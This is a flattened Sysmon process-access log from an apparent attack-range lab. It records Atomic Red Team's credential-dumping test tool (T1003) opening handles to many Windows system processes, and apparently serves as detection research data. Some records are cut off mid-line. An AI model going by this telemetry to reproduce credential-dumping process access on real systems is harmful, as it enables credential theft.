17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942842Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942841Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942840Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942839Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942838Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942837Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942836Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942834Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942833Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942832Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942796Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942795Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942794Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942793Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942792Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942791Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942790Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
